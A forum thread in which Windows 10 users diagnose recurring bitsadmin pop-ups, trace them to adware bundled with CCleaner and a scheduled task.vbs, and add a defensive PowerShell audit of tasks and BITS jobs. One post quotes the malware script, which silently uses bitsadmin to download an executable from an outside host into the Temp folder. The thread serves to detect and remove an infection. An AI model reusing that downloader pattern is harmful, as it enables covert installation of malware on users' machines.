Bitsadmin pops up randomly and immediately disappears (take 2?)


  1. Posts : 6
    Windows 10
       #1

    Bitsadmin pops up randomly and immediately disappears (take 2?)


    I hate to start naming people off here like an assembly line, but I find myself in the same situation as @tkrisz0403 in that my Command Prompt, accompanied by the exact same text as the former case, as seen in the first screenshot I provide, which I managed to capture using OBS Studio (please feel free to snoop through my dungeons and dragons writing at your leisure). I proceeded to follow some of the advice provided by @Hydranix and @Superfly by proceeding to download the bitsadmin buster.zip, which did promptly catch and freeze the process. The txt it provided was also identical, "Parent Process Name: cmd.exe" (of which I'll also produce a screenshot, mainly because I'm not knowledgeable enough to do anything else in a forum).

    I then went on further with the instructions in that particular forum, first entering "Get-BitsTransfer -AllUsers | select -ExpandProperty FileList | Select -ExpandProperty RemoteName" into PowerShell as recommended by @Superfly, which gave me slightly different results. Still, cloudfront.net appeared to be the issue, as it came up in an almost identical fashion as in @tkrisz0403's case. I proceeded to enter the command prompt provided by @Superfly:

    "@echo off
    net stop BITS
    ipconfig /flushdns
    del "%ALLUSERSPROFILE%\Application Data\Microsoft\Network\Downloader\qmgr0.dat"
    del "%ALLUSERSPROFILE%\Application Data\Microsoft\Network\Downloader\qmgr1.dat"
    net start BITS

    net stop wuauserv
    net start wuauserv"

    It was at this point the results appeared different enough that I, not being an expert in this field, didn't want to go any further, the results of which again being posted in a screen shot. I've downloaded ADWcleaner, which was the next recommended step to check for the possibility of malware, which I firmly believe it is, but have ceased to move forward until some fine chap comes along and tells me "Aw, you adorable little monkey, here, do this," and out of the kindness of their hearts decides to guide me through this process. I hope to hear from anyone and everyone soon, and I drink to your health and good fortune. Cheers ... (Hm, that emoji doesn't quite do me justice. I'm not a drunk, I'm just Irish, I swear.)

    P.S. As an additional update, while typing this, I do believe I did see the command prompt pop up again, though I wasn't thoroughly paying attention and cannot be certain. Could be paranoia. Could be the buster ceased to work after a time. I'm not sure. As an additional precaution, I'm posting yet another screen of the command prompt that stayed after downloading and executing the bitsadmin buster.exe, though it is and has been completely blank. If there is any other information I can provide, I won't hesitate to do so.
    Attached Thumbnails: screenshot-2-.png, screenshot-3-.png, screenshot-4-.png, screenshot-5-.png, screenshot-6-.png



  2. Posts : 3,105
    W10 Pro + W10 Preview
       #2

    It's a Google toolbar usually bundled with Ccleaner....a snooper, potentially unsafe.
    To eradicate in Safe Mode...Hitman Pro or ADWcleaner.


  3. Posts : 4,224
    Windows 10
       #3

    Just a quick fyi for CCleaner users (like me): one week after a new edition hits their CCleaner builds page, they post a "slim" version of the program that has no bundleware in it at all. If you're willing to wait, you can skip that extra add-in altogether.
    Attached image: ccblds.jpg
    For example, ccsetup524.exe showed up on the site on Monday, Nov 14, I believe. That means ccsetup524-slim.exe should show up on 11/21. I'll wait to download and install that one, instead of the "Standard installer" version.
    HTH,
    --Ed--


  4. Posts : 3,105
    W10 Pro + W10 Preview
       #4

    Thanks for the tip, Ed....a bit naughty in the first place, CCleaner not notifying that installed bundleware came with the package.


  5. Posts : 3,453
       #5

    I doubt CCleaner is to blame (other than for the adware)... but anyway, the problem I think relates to a script called task.vbs.

    See here for removal instructions.


  6. Posts : 3,105
    W10 Pro + W10 Preview
       #6

    Superfly said:
    I doubt CCleaner is to blame (other than for the adware)... but anyway, the problem I think relates to a script called task.vbs.

    See here for removal instructions.
    Confirmation of what was installed with CCleaner.....note the name change from your posted link but unmistakable connection.
    Attached Thumbnails: tasks.png


  7. Posts : 3,453
       #7

    OK, thanx for checking that out - what we need to do now, is find that script and see what it calls via bitsadmin.

    PS: Assuming we are on the right path with this....

    The task.vbs apparently contains this:

    Code:
    Set WshShell = CreateObject("WScript.Shell")
    
    cmds=WshShell.RUN("bitsadmin /transfer amijob /download /priority high http://www.nice-doggy.xyz/run/Updater.exe C:\Users\Tejas\AppData\Local\Temp\amiupdater912.exe",0,False)
    
    WScript.Sleep 300000
    
    cmds=WshShell.RUN("bitsadmin /cancel amijob",0,False)
    
    Set WshShell = Nothing
    It creates a bits job called "amijob" then downloads an updater exe to the temp folder. Waits a set period (I guess for the download to complete), it then cancels the bitsjob. Assuming another task then runs the updater from temp.

    Info: Malware scan of task.vbs 04f5d27e461b2ff0da24b6a367b81d6d4d3c817d - Reason Core Security Labs
    Last edited by Superfly; 16 Nov 2016 at 13:57.
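
As an added example (not code posted by anyone in this thread), one way to carry out the step described in post #7, finding the hidden script and seeing what it hands to bitsadmin, is to list scheduled tasks that start a script host or a script file and print the bitsadmin lines found in the referenced script; it also lists live BITS jobs with their URLs, as in post #1. The extension list and the launcher list are assumptions chosen for this example.

```powershell
# Added example (not from the thread). Run in an elevated PowerShell session
# so that tasks and BITS jobs belonging to every user are visible.
$scriptRx = '(?i)"([^"]+\.(?:vbs|vbe|js|jse|wsf|bat|cmd|ps1))"|(\S+\.(?:vbs|vbe|js|jse|wsf|bat|cmd|ps1))'
$hostRx   = '(?i)\b(wscript|cscript|bitsadmin)(\.exe)?\b'   # assumption: launchers worth reviewing

$taskFindings = foreach ($task in Get-ScheduledTask) {
    foreach ($action in $task.Actions) {
        if (-not $action.Execute) { continue }   # COM-handler actions have no command line
        $cmdLine = "$($action.Execute) $($action.Arguments)"
        $m = [regex]::Match($cmdLine, $scriptRx)
        if (-not $m.Success -and $cmdLine -notmatch $hostRx) { continue }

        # Resolve the referenced script, if any, and pull out its bitsadmin lines.
        $scriptPath = $null
        $hits = @()
        if ($m.Success) {
            $raw = if ($m.Groups[1].Success) { $m.Groups[1].Value } else { $m.Groups[2].Value }
            $scriptPath = [Environment]::ExpandEnvironmentVariables($raw)
            if (Test-Path -LiteralPath $scriptPath -PathType Leaf) {
                $hits = @(Select-String -LiteralPath $scriptPath -Pattern 'bitsadmin' -SimpleMatch |
                          ForEach-Object { $_.Line.Trim() })
            }
        }
        [pscustomobject]@{
            Task        = $task.TaskPath + $task.TaskName
            State       = $task.State
            CommandLine = $cmdLine
            Script      = $scriptPath
            Bitsadmin   = $hits -join "`n"
        }
    }
}
$taskFindings | Format-List

# Live BITS jobs with source URL and destination file. The job in task.vbs is
# cancelled after 300000 ms, so an empty list here does not clear the machine.
$bitsFindings = Get-BitsTransfer -AllUsers | ForEach-Object {
    $job = $_
    foreach ($file in $job.FileList) {
        [pscustomobject]@{
            Job    = $job.DisplayName
            Owner  = $job.OwnerAccount
            State  = $job.JobState
            Remote = $file.RemoteName
            Local  = $file.LocalName
        }
    }
}
$bitsFindings | Format-Table -AutoSize -Wrap
```

A task whose script downloads an executable into a Temp folder with a hidden window, as task.vbs does, is the pattern to look for in the `Bitsadmin` column.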


  8. Posts : 3,105
    W10 Pro + W10 Preview
       #8

    Quite a lot on my machine.....red markings my name.....how to differentiate between M$ and any intruder?...I am confident this my Surface Pro 4 is clean as I have it Bitlocker encrypted.
    Attached Thumbnails: bits.png


  9. Posts : 3,453
       #9

    Those are fine - they are just the executable and dependencies in the components folder... it's the hidden scripts that call it, that's the problem.


  10. Posts : 5,478
    2004
       #10

    dencal said:
    I am confident this my Surface Pro 4 is clean as I have it Bitlocker encrypted.
    A bit off topic this but bitlocker will not do anything to stop you getting infected. Whether you have it turned on or not is transparent to programs running on your PC. It is to stop people getting information off your disk if you leave your laptop in a taxi or whatever.


 

Windows 10 Forums is an independent web site and has not been authorized, sponsored, or otherwise approved by Microsoft Corporation. "Windows 10" and related materials are trademarks of Microsoft Corp.
